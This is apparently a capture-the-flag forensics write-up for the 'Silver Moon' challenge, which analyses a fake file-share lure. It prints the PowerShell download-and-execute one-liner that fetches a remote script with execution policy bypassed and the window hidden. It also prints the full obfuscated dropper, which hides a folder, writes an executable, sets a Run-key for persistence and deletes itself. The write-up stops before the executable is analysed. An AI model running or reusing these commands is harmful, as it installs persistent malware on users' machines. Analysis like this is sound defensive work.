Categoryforensics
PublishedJuly 29, 2025
CompetitionWWFCTF
Points481
Authorserioton
Rank

[WWFCTF] Forensics - Silver Moon Writeup

[WWFCTF] Forensics - Silver Moon Writeup

[WWFCTF] Writeup - Forensics / Silver Moon

challenge description
challenge description

Before we continue, I wanna thank the WWF team for the amazing challenges.

🧩 Challenge Summary:

We’re given a suspicious-looking URL that resembles a Microsoft file share, similar to the campaigns going around (like the CAPTCHA malware). It instructs the user to paste a PowerShell command directly into the Windows File Explorer.

Challenge url
Challenge url

Here’s the command that gets copied:

powershell -ep bypass -w hidden IEX(New-ObjEct System.Net.Webclient).Downloadstring('https://powershell.wwctf.com/update.ps1') # C:\HR\Application.docx

This command:

Bypasses execution policy restrictions (-ep bypass)

Hides the window (-w hidden)

Executes in memory (via IEX with DownloadString)

📜 Investigating update.ps1

Visiting the file the command is trying to download https://powershell.wwctf.com/update.ps1 , we can open and view the PowerShell source without downloading it locally.

✅ Step 1: Understand the Logic

For now we can ignore the huge base64 blob, we look at the decoded part of the script:

$kXVWlUwNPEw=@("asd==")-join'';$SAlaAox=$kXVWlUwNPEw;$hLXHNNQnb=[Convert]::FromBase64String($SAlaAox);$geMBPeaVORuLk=[System.Text.Encoding]::UTF8.GetString($hLXHNNQnb);$geMBPeaVORuLk=ConvertFrom-Json $geMBPeaVORuLk;$ZhWOQbu=("{0}{1}{2}"-f'J1','Csum','3Dcj');$ALMVCnyJSuzBnE=Join-Path $env:USERPROFILE ((("{3}{0}{2}{1}{4}"-f'ts','J1Cs','G1t','Documen','um3Dcj')) -crEPLAce ([chaR]71+[chaR]49+[chaR]116),[chaR]92);if(-not (Test-Path $ALMVCnyJSuzBnE)){New-Item -ItemType Directory -Path $ALMVCnyJSuzBnE|Out-Null;(Get-Item $ALMVCnyJSuzBnE).Attributes += ("{0}{1}{2}" -f 'H','idd','en'),("{0}{1}"-f 'Sys','tem')};foreach($file in $geMBPeaVORuLk.aixrdrPVmiaT){; $p=Join-Path $ALMVCnyJSuzBnE $file.bHSoyPyFwZgB; [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String($file.PthYIs));};Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);$EHPoSQvgWxy=[IO.Path]::ChangeExtension([IO.Path]::GetTempFileName(),'cmd');[IO.File]::WriteAllText($EHPoSQvgWxy, ((("{13}{6}{25}{10}{23}{9}{3}{21}{18}{12}{1}{4}{2}{11}{14}{0}{16}{8}{17}{20}{24}{22}{15}{5}{7}{26}{19}"-f'yJ1Csum3DcjDuy','LE%Du','umen','A','yDoc','
del U',' ','AC%~','pdate','AC /b U','start UA','t','RPROFI','@echo','sDu','
','u','.e','SE','AC','x','C%U','UAC','CU','e','off

','f0U')).rEPLaCe(([cHAr]85+[cHAr]65+[cHAr]67),[sTRIng][cHAr]34).rEPLaCe(([cHAr]68+[cHAr]117+[cHAr]121),[sTRIng][cHAr]92)));Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);Set-ItemProperty -Path ((("{8}{2}{5}{1}{0}{6}{3}{7}{4}"-f'ows{0}C','d','oftwar','rr','Version{0}Run','e{0}Microsoft{0}Win','u','ent','HKCU:{0}S')) -F[char]92) -Name ("{2}{0}{1}"-f 'Ao','prv','l') -Value "$env:USERPROFILE\Documents\J1Csum3Dcj\update.exe";Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);$ws=New-Object -ComObject WScript.Shell;$ws.Run($EHPoSQvgWxy,0,$false);Remove-Item $MyInvocation.MyCommand.Path -Force

we can try to read it but since its a bit obfuscated we can just paste it to chatgpt and get a short eplanation of what it does:

> This PowerShell script is a malicious dropper that first creates a hidden, system-attributed directory (J1Csum3Dcj in Documents). It then (assuming valid input for $geMBPeaVORuLk) decodes and writes an executable (e.g., update.exe) into this hidden directory. Next, it sets a Registry Run key so the executable launches automatically at every user login, ensuring persistence. It creates and executes a temporary, hidden .cmd file designed to silently run the dropped executable (potentially attempting a UAC bypass). Finally, the original PowerShell script deletes itself to remove traces. Its purpose is to silently install and execute malware, establish persistence, and hide its presence.

This is a full-fledged dropper, designed to install malware and stay hidden.

🔬 Step 2: Extract the Payload (Executable)

Back to the big base64 blob (likely representing the dropped EXE)


1. Copy the entire base64 section from update.ps1
2. Head over to CyberChef
3. Use the operation: From Base64

entire base64 section decoded from update.ps1
entire base64 section decoded from update.ps1

Now we’ve got the binary payload.


1. Copy the entire base64 section again
3. Use the same operation: From Base64
4. Save the output as update.exe (or whatever it decodes to)

second base64 blob decoded binary
second base64 blob decoded binary

📜 Analyzing the Executable

At this point, we can analyze the exe in three ways:

  1. Upload update.exe to VirusTotal.
  2. Use Ghidra, or IDA Free to reverse engineer it.
  3. Run the executable to automatically unpack and analyze it.

To be continued...

root@home:~/writeups$
← Back to all writeups